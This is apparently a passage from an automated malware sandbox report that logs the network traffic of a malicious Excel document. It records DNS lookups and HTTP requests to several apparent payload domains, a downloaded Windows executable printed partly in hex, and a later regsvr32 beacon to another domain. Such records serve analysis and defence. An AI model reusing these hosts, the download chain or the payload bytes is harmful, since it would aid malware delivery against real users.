                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.125758886 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.125858068 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.126223087 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.126239061 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.126317978 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.127289057 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.127307892 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.127430916 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.128376007 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.128396988 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.128448009 CEST49168443192.168.2.22143.204.91.74
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.129455090 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.129472971 CEST44349168143.204.91.74192.168.2.22
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.129556894 CEST49168443192.168.2.22143.204.91.74
Jul 6, 2021 16:03:23.130582094 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.130601883 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.130664110 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.131661892 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.131695986 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.131793022 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.132787943 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.132808924 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.132884979 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.133846045 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.133881092 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.133943081 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.134917974 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.134936094 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.135005951 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.136137009 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.136161089 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.136229038 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.137139082 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.137161970 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.137248039 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.138254881 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.138278961 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.138390064 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.139298916 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.215830088 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.215858936 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.215959072 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.216761112 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.216780901 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.216875076 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.217413902 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.217434883 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.217509031 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.218400955 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.218420029 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.218480110 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.219659090 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.219741106 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.219827890 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.220601082 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.220621109 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.220691919 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.221695900 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.221714973 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.221776009 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.222913980 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.222934008 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.222992897 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.223912001 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.223932981 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.223995924 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.224987984 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.225007057 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.225068092 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.226073027 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.226093054 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.226147890 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.227216959 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.227238894 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.227327108 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.228367090 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.228387117 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.228466988 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.229347944 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.304974079 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.305000067 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.305128098 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.305402994 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.305422068 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.305480957 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.306499958 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.306519985 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.306581020 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.307677984 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.307898998 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.307991982 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.308759928 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.308825970 CEST | 443 | 49168 | 143.204.91.74 | 192.168.2.22
Jul 6, 2021 16:03:23.308892012 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:03:23.511923075 CEST | 49169 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 16:03:23.549920082 CEST | 80 | 49169 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 16:03:23.550023079 CEST | 49169 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 16:03:23.550395012 CEST | 49169 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 16:03:23.588284969 CEST | 80 | 49169 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 16:03:24.097198009 CEST | 80 | 49169 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 16:03:24.097229004 CEST | 80 | 49169 | 104.21.37.209 | 192.168.2.22
Jul 6, 2021 16:03:24.097400904 CEST | 49169 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 16:03:26.632364035 CEST | 49169 | 80 | 192.168.2.22 | 104.21.37.209
Jul 6, 2021 16:03:26.632416964 CEST | 49168 | 443 | 192.168.2.22 | 143.204.91.74
Jul 6, 2021 16:05:20.092789888 CEST | 49167 | 80 | 192.168.2.22 | 172.67.146.88
Jul 6, 2021 16:05:20.093063116 CEST | 49166 | 80 | 192.168.2.22 | 172.67.194.117
Jul 6, 2021 16:05:20.093310118 CEST | 49165 | 80 | 192.168.2.22 | 172.67.198.51
Jul 6, 2021 16:05:20.131356955 CEST | 80 | 49167 | 172.67.146.88 | 192.168.2.22
Jul 6, 2021 16:05:20.131504059 CEST | 80 | 49166 | 172.67.194.117 | 192.168.2.22
Jul 6, 2021 16:05:20.131519079 CEST | 80 | 49165 | 172.67.198.51 | 192.168.2.22
Jul 6, 2021 16:05:20.131527901 CEST | 49167 | 80 | 192.168.2.22 | 172.67.146.88
Jul 6, 2021 16:05:20.131556988 CEST | 49166 | 80 | 192.168.2.22 | 172.67.194.117
Jul 6, 2021 16:05:20.131568909 CEST | 49165 | 80 | 192.168.2.22 | 172.67.198.51

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 6, 2021 16:03:20.143704891 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 16:03:20.203722954 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 16:03:20.353357077 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 16:03:20.427000999 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 16:03:20.600858927 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 16:03:20.670613050 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 16:03:21.694626093 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 16:03:21.759349108 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 16:03:21.784051895 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 16:03:21.841223955 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 16:03:23.379229069 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 16:03:23.440926075 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 16:03:23.451970100 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 16:03:23.509531975 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 6, 2021 16:03:20.143704891 CEST | 192.168.2.22 | 8.8.8.8 | 0xfda2 | Standard query (0) | thousandsyears.download | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:20.353357077 CEST | 192.168.2.22 | 8.8.8.8 | 0x5115 | Standard query (0) | voopeople.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:20.600858927 CEST | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | uppercilio.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:21.694626093 CEST | 192.168.2.22 | 8.8.8.8 | 0x6fb2 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:21.784051895 CEST | 192.168.2.22 | 8.8.8.8 | 0x4495 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:23.379229069 CEST | 192.168.2.22 | 8.8.8.8 | 0xbcac | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:23.451970100 CEST | 192.168.2.22 | 8.8.8.8 | 0x6d9f | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 6, 2021 16:03:20.203722954 CEST | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | thousandsyears.download | - | 172.67.198.51 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:20.203722954 CEST | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | thousandsyears.download | - | 104.21.52.111 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:20.427000999 CEST | 8.8.8.8 | 192.168.2.22 | 0x5115 | No error (0) | voopeople.fun | - | 172.67.194.117 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:20.427000999 CEST | 8.8.8.8 | 192.168.2.22 | 0x5115 | No error (0) | voopeople.fun | - | 104.21.12.122 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:20.670613050 CEST | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | uppercilio.fun | - | 172.67.146.88 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:20.670613050 CEST | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | uppercilio.fun | - | 104.21.55.83 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:21.759349108 CEST | 8.8.8.8 | 192.168.2.22 | 0x6fb2 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 16:03:21.759349108 CEST | 8.8.8.8 | 192.168.2.22 | 0x6fb2 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | - | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 16:03:21.759349108 CEST | 8.8.8.8 | 192.168.2.22 | 0x6fb2 | No error (0) | dr49lng3n1n2s.cloudfront.net | - | 143.204.91.74 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:21.841223955 CEST | 8.8.8.8 | 192.168.2.22 | 0x4495 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 16:03:21.841223955 CEST | 8.8.8.8 | 192.168.2.22 | 0x4495 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | - | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 16:03:21.841223955 CEST | 8.8.8.8 | 192.168.2.22 | 0x4495 | No error (0) | dr49lng3n1n2s.cloudfront.net | - | 143.204.91.74 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:23.440926075 CEST | 8.8.8.8 | 192.168.2.22 | 0xbcac | No error (0) | astrocycle.download | - | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:23.440926075 CEST | 8.8.8.8 | 192.168.2.22 | 0xbcac | No error (0) | astrocycle.download | - | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:23.509531975 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d9f | No error (0) | astrocycle.download | - | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 16:03:23.509531975 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d9f | No error (0) | astrocycle.download | - | 172.67.213.115 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• thousandsyears.download
• voopeople.fun
• uppercilio.fun
• astrocycle.download

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 172.67.198.51 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 16:03:20.257003069 CEST | 0 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: thousandsyears.download
    Connection: Keep-Alive
Jul 6, 2021 16:03:20.326716900 CEST | 1 | IN | HTTP/1.1 200 OK
    Date: Tue, 06 Jul 2021 14:03:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 409
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=aN2nm8l3J68Dr%2BONnWhtbUxrD00DwDAPSZXrTK7QJvLTStjDQvCXlIjJT97JlRyRE8V32lIboKjKhIiQSk9Kj1MImXsy8Lrcw%2FUioDhd9E5oQzH53IdhpNdCNpz1Wj%2FYR%2B60gjQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66a9603bcfab4a9e-FRA
    Content-Encoding: gzip
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
    Data Ascii: 14
Jul 6, 2021 16:03:20.326762915 CEST | 1 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 172.67.194.117 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 16:03:20.471748114 CEST | 2 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: voopeople.fun
    Connection: Keep-Alive
Jul 6, 2021 16:03:20.528039932 CEST | 3 | IN | HTTP/1.1 200 OK
    Date: Tue, 06 Jul 2021 14:03:20 GMT
    Content-Type: application/octet-stream
    Content-Length: 57856
    Connection: keep-alive
    Content-Disposition: attachment; filename=lsdfik.fml
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 408
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ok0%2BKH3qYq2KE6v3gQLN3TWTjlXs%2FKCRGpa%2FlFhmTNEoEITtRmc8v%2F0WKD6n6Q3yMMghYJeW2oB30YxmpG2A3fj2joIQxvcX8ud1RSYOYd%2BwmI%2BaTcYISYPeXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66a9603d29d64e2b-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                                        Data Ascii: $DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528278112 CEST15INData Raw: 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42
                                                                                                                                                                                                                                        Data Ascii: $PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528304100 CEST16INData Raw: 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68
                                                                                                                                                                                                                                        Data Ascii: DDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+H
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528733969 CEST18INData Raw: 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00
                                                                                                                                                                                                                                        Data Ascii: $H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 172.67.146.88 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp: Jul 6, 2021 16:03:20.711160898 CEST
kBytes transferred: 65
Direction: OUT
Data:
GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: uppercilio.fun
Connection: Keep-Alive

Timestamp: Jul 6, 2021 16:03:20.792047977 CEST
kBytes transferred: 66
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 14:03:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 408
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=fWeVWVyypSGUJiGje2Lz8ONAgj21T%2B%2B4PaHC6GAKNCA9IIT7XF6bu%2Bmy0iUK3ytjvWJ%2BzMAcuIn01qcvHEJmSXD7soAQFo8kkSuKqLvBlBQksEadWY6ZbA4zOMo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9603ead492bb9-FRA
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
Data Ascii: 14

Timestamp: Jul 6, 2021 16:03:20.792083025 CEST
kBytes transferred: 66
Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49169 | 104.21.37.209 | 80 | C:\Windows\System32\regsvr32.exe

Timestamp: Jul 6, 2021 16:03:23.550395012 CEST
kBytes transferred: 325
Direction: OUT
Data:
GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=3565085024:1:8053:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=353036303133:416C627573:30363131453532434638444631434333; __io=0; _gid=67AFEDC5AC03
Host: astrocycle.download

Timestamp: Jul 6, 2021 16:03:24.097198009 CEST
kBytes transferred: 326
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Tue, 06 Jul 2021 14:03:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=c9m9rUyBRXM1jwbZnQnjrdkcxrPLNKC33w7AQ0XAQre54ieS8G0YxkLLsb6qhBGQAR8g40dUX3LfP44TOwFsAmBmZl7LDWuENpEDOUNNRrD%2Fc6PWZud4EH25iI48xq4vIg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a960506f5bc2f4-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>

Timestamp: Jul 6, 2021 16:03:24.097229004 CEST
kBytes transferred: 326
Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


HTTPS Packets

Timestamp: Jul 6, 2021 16:03:21.934479952 CEST
Source IP: 143.204.91.74
Source Port: 443
Dest IP: 192.168.2.22
Dest Port: 49168
JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d

